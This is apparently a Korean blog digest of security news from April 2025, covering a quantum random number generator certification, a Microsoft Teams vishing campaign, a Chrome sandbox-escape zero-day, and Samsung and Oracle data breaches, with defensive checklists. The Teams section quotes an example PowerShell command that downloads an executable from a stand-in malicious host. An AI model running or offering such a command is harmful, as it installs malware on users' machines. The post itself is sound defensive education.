퀀티넘 양자 난수 생성기, 美 NIST 인증 획득
https://www.boannews.com/media/view.asp?idx=136765&skind=D
퀀티넘 양자 난수 생성기, 美 NIST 인증 획득
퀀티넘은 자사 소프트웨어 방식 난수 생성기(QRNG) ‘퀀텀 오리진’이 미국 국립표준기술연구소(NIST) 인증을 획득했다고 밝혔다.
www.boannews.com
- QRNG(Quantum Random Number Generator)
- 전통적 난수 생성기(PRNG)는 결정론적 알고리즘 기반 → 예측 가능성 있음
- QRNG는 양자 현상의 불확정성을 기반으로 비결정적, 진정한 난수를 생성
- 기존 QRNG는 일바적으로 하드웨어 기반 (예를 들면 광자, 전자스핀 등)
- 퀀텀 오리진은 소프트웨어 기반으로 QRNG 구현 -> 기존대비 확장성과 접근성이 올라감
- PQC(Post-Quantum Cryptography, 양자내성암호)
- 양자컴퓨터는 RSA, ECC 등 기존 암호를 빠르게 깨버릴 수 있음
- PQC는 이러한 양자공격에 안전한 암호체계
- 미국 연방기관은 NIST 표준화에 따라 PQC 도입이 점진적으로 의무화 됨
- 퀀텀 오리진은 PQC 환경에 신뢰할 수 있는 난수 생성 도구 제공
- NIST 인증으로 정부·국방·보안 기관 납품 가능, 신뢰도 확보
- 하드웨어 의존성 제거로 배포, 유지비용 ↓, 민감 환경에서도 적용 가능
- 양자보안 전환 가속화에 의의가 있음 (PQC, 보안 모듈 등에 즉시 활용 가능)
- QRNG & PQC 연계 시너지
- QRNG = 무작위성의 신뢰 확보
- PQC = 알고리즘 구조의 양자 내성 확보
| 보안에 기여하는 점 | 설명 |
| 암호 체계의 무작위성 근간 강화 | 예측불가능한 난수로 암호화 및 서명 안정성 ↑ |
| 양자 위협 대응 가능 | PQC + QRNG 조합으로 향후 공격 대비 |
| 내부자 공격 차단 | 난수 제어 불가능 → 위·변조 위험 ↓ |
| 인터넷 통신 보안 강화 | TLS/VPN/SSH 등 전반적 프로토콜 강건성 ↑ |
| 규제 및 인증 대응 | NIST 인증으로 법적·산업적 채택 가능성 ↑ |
MS 협업 툴 ‘팀즈’, 대화 조심...‘비싱’ 공격에 악용
https://www.boannews.com/media/view.asp?idx=136744
MS 협업 툴 ‘팀즈’, 대화 조심...‘비싱’ 공격에 악용
마이크로소프트 협업 메신저 팀즈를 활용해 사용자 기기에 악성 코드를 심는 ‘비싱’ 공격이 포착됐다.
www.boannews.com
| 구분 | 피싱 (Phishing) | 비싱 (Vishing) |
| 정의 | 이메일·메신저 등을 통해 가짜 링크나 첨부파일로 정보를 탈취 |
음성통화(Voice) 기반으로 사용자를 속여 민감 정보나 실행을 유도 |
| 매체 | 이메일, 문자, 채팅 | 전화, VoIP, Teams/Zoom 통화 등 |
| 특징 | 링크 클릭, 로그인 유도 | 실시간 대화 통한 심리적 압박, 실행 유도 |
| 위험 요소 | 첨부 파일, 악성 링크 | 음성 설득 + 실행 명령 유도 (예: PowerShell 입력) |
| 최근 트렌드 | 스피어 피싱, QR 피싱 | Deepfake 음성 활용, 협업툴 기반 비싱 증가 |
- 공격 흐름 요약
- MS Teams 외부 채팅 기능을 이용해 사용자를 속이는 메시지를 전송하고, 동시에 비싱(음성 통화)을 병행하여 신뢰를 형성함
- 사용자에게 PowerShell 명령어 입력을 유도해 악성 스크립트를 실행시킴
- 이 과정에서 Quick Assist를 통해 공격자는 원격 제어 권한을 획득함
- 공격자는 TeamViewer.exe와 TV.dll을 숨겨진 폴더에 설치하여 추가적인 제어 수단을 마련함
- 시작 프로그램 폴더에 바로가기 파일을 등록하고, BITS(Background Intelligent Transfer Service)를 통해 파일을 장기간 은닉하며 다운로드
- 마지막으로 index.js 기반 자바스크립트 백도어를 설치하고, 이를 node.js 런타임을 통해 실행해 공격자와 socket 통신으로 실시간 기기 제어를 확보함
- MS Teams 외부 채팅 기능
- 내부 시스템으로의 프론트도어 침투 경로가 됨
- 대응 방안 : 외부채팅 차단 / 도메인 제한 / 메시지 모니터링
- 비싱
- 신뢰 형성 후 명령어 입력 또는 원격 요청 수락 실행을 유도하는 통화를 함
- 대응 방안 : 교육, 음성 피싱 툴 감지, 행동기반 탐지
- Powershell 실행 유도
- 예시 명령 : Invoke-WebRequest http://malicious.site/file.exe -OutFile temp.exe
- 대응 방안 : PowerShell 로깅, AMSI(Antimalware Scan Interface) 활용, 이상 명령어 필터링
- Quick Assist
- 공격자가 도움 요청하는 형식으로 접근 가능
- 대응 방안 : Quick Assist 사용 모니터링, 원격 제어 로그 분석
- TeamViewer+TV.dll악성 모듈
- 원격 제어 툴 TeamViewer를 정상처럼 보이게 설치
- 추가 모듈 TV.dll이 악성 행위를 수행 (C2 서버와 연결 등)
- 대응 방안 : 실행 경로, 해시값, 네트워크 목적지 기반 탐지
- 시작폴더 등록 +BITS 다운
- 시작 폴더 등록: 시스템 부팅 시 자동 실행
- BITS (Background Intelligent Transfer Service): 파일을 조용히 다운로드 → 흔적 남기기 어려움
- 대응 방안 : 시작 프로그램 감시, BITS 네트워크 활동 분석
- Index.js 백도어 + node.js
- 자바스크립트 기반 백도어 스크립트 실행 → 공격자 서버와 socket 통신
- Node.js 런타임에서 실행되며, 원격 shell 제공 가능
- 대응 방안 : Node.js 실행 추적, socket 연결 분석, 백도어 서명 기반 탐지
카스퍼스키, 구글 크롬서 ‘제로데이’ 취약점 발견
https://www.boannews.com/media/view.asp?idx=136717
카스퍼스키, 구글 크롬서 ‘제로데이’ 취약점 발견
카스퍼스키가 크롬(Chrome) 브라우저의 샌드박스 보호 시스템을 우회하는 정교한 제로데이 취약점(CVE-2025-2783)을 발견하고 패치를 지원했다. 회사는 구글 크롬과 크로미엄 기반 브라우저를 최신
www.boannews.com
1. 사건 요약(CVE-2025-2783)
- 발견 : 카스퍼스키 GReAT (Global Research & Analysis Team)
- 취약점 : 크롬 샌드박스 보호 우회 제로데이
- 영향 : 구글 크롬 및 크로미엄 기반 브라우저 전체 (Edge, Brave 등 포함)
- 감염 경로 : 피싱 이메일 내 악성 링크 클릭 -> 브라우저에서 취약점 자동 실행
- 대응 : 2025년 3월 25일 긴급 보안 패치 배포됨
- 공격 명칭 : Operation ForumTroll
- 공격 방식 : 국제 포럼 초청 메일 사칭, 단기 악성 링크 사용, APT로 추정
2. 공격 시나리오 요약
- 피싱 메일 유포
- 공격자는 ‘Primakov Readings’ 국제 포럼 초청장을 사칭한 피싱 이메일을 발송
- 수신자는 해당 링크를 클릭하게 유도
- 악성 링크 클릭 시 감염
- 사용자가 링크를 클릭하는 순간 링크는 짧은 시간 동안만 활성화되어 악성 페이로드를 브라우저에 전달
- 이 페이로드는 브라우저의 샌드박스 우회 제로데이 취약점(CVE-2025-2783)을 이용해 실행
- 브라우저 샌드박스 우회
- 샌드박스를 우회한 악성 코드가 브라우저 프로세스 밖에서 실행 권한을 획득
- 이후 시스템 접근이 가능
- 원격 코드 실행 및 지속성 확보
- 감염된 시스템은 외부 C2 서버와 연결되며 이후 추가적인 원격 코드 실행 또는 정보 수집, 장기적인 지속성 확보 단계로 넘어감
- APT 수준 공격 특성
- 해당 공격은 정교하게 타깃을 한정하고, 시간 기반으로 탐지를 회피하며 국가급 자원이 투입된 APT 그룹의 행위로 추정됨
3. 보안 개념 정리
- 샌드박스 : 브라우저/앱 내에서 코드 실행을 “격리된 환경”으로 제한하여 시스템 전체 접근을 방지하는 보안 핵심 기술
- 이번 취약점은 이 격리를 깨고 브라우저 외부로 권한을 탈출한 것
- 제로데이 : 제조사도 모르는 미공개 취약점
- 패치 전까지 방어 불가
- RCE (Remote Code Execution) : 원격에서 명령 실행 권한 획득하는 공격 기법
- APT (Advanced Persistent Threat) : 장기간 은밀하게 침투해 정보 탈취하는 고도화 공격
4. 실무 대응 체크리스트
- 브라우저 업데이트 - Chrome & Chromium 최신화 (2025.03.25 패치)
- 이메일 보안 강화 - 모의 훈련, 스피어 피싱 시나리오 교육
- 샌드박스 보호 보강 - Chrome Enterprise 정책 적용, Site Isolation 사용
- 이상행위 탐지 - EDR 활용, TTP 기반 탐지 룰 구성
- 위협 인텔리젼스 연동 - IoC 반영, 블랙리스트 관리
삼성전자, 털렸다...獨 고객DB 대량 유출
https://www.boannews.com/media/view.asp?idx=136726
삼성전자, 털렸다...獨 고객DB 대량 유출
삼성전자 독일 법인의 고객 정보 27만명이 유출돼 해커들의 온라인 포럼에 풀렸다.
www.boannews.com
오라클, 해킹 당해...의료 서비스 해킹, 환자 정보 유출
https://www.boannews.com/media/view.asp?idx=136696
오라클, 해킹 당해...의료 서비스 해킹, 환자 정보 유출
오라클 컴퓨터 시스템이 해킹돼 의료 부문 고객사 정보가 유출됐다.
www.boannews.com
1. 사건 개요 비교
| 항목 | 삼성전자 독일 법인 | 오라클 (서너) |
| 시점 | 2025년 4월 보도 / 2021년 계정 재활용 | 2024년 1월~3월 사이 침해 |
| 유출 경로 | 2021년 Spectos 해킹 → 계정 재활용 | Cerner 구형 서버 해킹 (미이전 자산) |
| 유출 범위 | 고객 27만명 정보 | 환자 수 미정 (최대 600만명 주장) |
| 침투 원인 | 과거 유출 계정의 미조치 | 레거시 시스템 방치 / 인증 시스템 노출 |
| 데이터 유형 | 이름, 주소, 이메일, 기기 모델, 주문/결제 내역 | 전자의무기록, 신원정보, LDAP/SSO 정보 |
| 공격자 정보 | GHNA (해커 포럼 활동) | rose87168 (클라우드 침입 주장) |
| 해킹 방식 | 정보 재활용 → 시스템 접근 | 인증 인프라 및 도메인 해킹 |
2. 보안 이슈 공통점 비교
| 보안 위험 요소 | 삼성전자 사건 | 오라클 사건 | 공통점 |
| 과거 침해 재활용 | O | O | ✅ |
| 고객 민감정보 포함 | O | O | ✅ |
| 인증/접근 시스템 위협 | 간접적 (계정 재활용) | 직접적 (LDAP/SSO 유출) | ✅ |
| 사후 대응 미흡 | “아무런 조치 없음” 언급됨 | 해킹 부인, 일부 부정확한 공지 | ✅ |
| 2차 피해 가능성 | 피싱, 택배 사기 등 | 인증 우회, 사칭 침투 등 | ✅ |
| APT/조직적 해킹 가능성 | GHNA = 전문 해커 정황 | rose87168 = 침투 경로 제안 | ✅ |
3. 대응 포인트 비교
| 대응 항목 | 삼성전자 대응 포인트 | 오라클 대응 포인트 | 공통 전략 제안 |
| 계정 관리 | 과거 유출 계정 폐기 및 접근 통제 | Cerner 인수 후 계정/자산 통합 점검 | 유출 계정 기반 시스템 접근 제한 필수 |
| 시스템 관리 | 내부 접근 로그 분석 및 타임라인 추적 | 레거시 서버 모니터링 및 강제 종료 | 자산 목록화 및 EOL 자산 점검 |
| 인증 보호 | 내부 고객 시스템 SSO 연동 확인 필요 | LDAP/SSO 로그 감시 및 구조 점검 | 인증 인프라에 대한 선제 보호 필요 |
| 침해 정보 대응 | 고객 알림 및 스피어피싱 방지 교육 필요 | 유출 여부 불확실 → 공식 조사 필요 | 사고 발생 시 신속한 통지와 IoC 공유 |
| 외부 연동 탐지 | 다크웹 등 위협 인텔 수집 | 해커 증거 기반 진위 검증 체계 필요 | TI 연계 실시간 위협 탐지 시스템 강화 |
4. 보안 전략 요점
| 전략 분야 | 핵심 요점 |
| 인증/접근 제어 | LDAP, SSO, 계정 기반 접근 경로는 가장 위험함 → 다단계 인증, 접근 권한 자동 만료 시스템 필수 |
| 유출 후 대응 | 단순 해킹 부인이나 지연된 대응은 피해 확대 → 공식 대응 프로토콜 수립 + 고객 통지 체계 필요 |
| 위협 재활용 탐지 | 과거 침해 정보의 재활용 가능성 존재 → 유출 계정 기반 Threat Hunting 필수 |
| 레거시 자산 관리 | 구형 시스템 방치는 구조적 리스크 → 인수 기업 자산 통합 전 보안 점검 프로세스 운영 |
| 위협 인텔리전스 연계 | 해커 포럼/블리핑컴퓨터 등에서 위협 조기 감지 → 자동 수집 + 실시간 분석 시스템 도입 권장 |
5. 핵심 보안 용어 정리
- 인포스틸러 (InfoStealer) : 사용자 컴퓨터에서 계정 정보, 인증서, 암호 등을 탈취하는 악성코드
- 삼성 사건: 스펙토스가 ‘라쿤 인포스틸러’에 감염되어 계정 유출
- 스피어피싱 (Spear Phishing) : 특정 인물이나 조직을 정밀하게 노리는 맞춤형 피싱 공격
- 삼성 사건: 이름·주소·기기 정보 기반 공격 우려
- 전자의무기록 (EMR) : 환자의 진료·처방 이력을 포함한 디지털 의료정보
- 오라클 사건: Cerner의 구형 서버에 저장된 EMR 유출
- SSO (Single Sign-On) : 한 번 로그인으로 여러 시스템에 접근 가능한 인증 기술
- 오라클 사건: 해커가 오라클 클라우드에서 SSO 데이터 확보 주장
- LDAP (Lightweight Directory Access Protocol) : 사용자·장비 정보를 디렉터리 형태로 관리하는 프로토콜
- 오라클 사건: LDAP 정보 노출 → 인증 우회 위험
- 레거시 시스템 (Legacy System) : 기술적으로 오래됐지만 아직 운영 중인 구형 시스템
- 오라클 사건: Cerner의 미이전 서버가 공격당함
- APT (Advanced Persistent Threat) : 장기간 침투 후 정보 탈취를 시도하는 고도화된 위협 그룹
- 두 사건 모두 고급 해커 그룹 개입 정황 존재
'보안뉴스' 카테고리의 다른 글
| 5월 보안뉴스 1 (1) | 2025.05.14 |
|---|---|
| 4월 셋째, 넷째주 보안뉴스 (0) | 2025.04.28 |
| 4월 둘째주 보안뉴스 (1) | 2025.04.13 |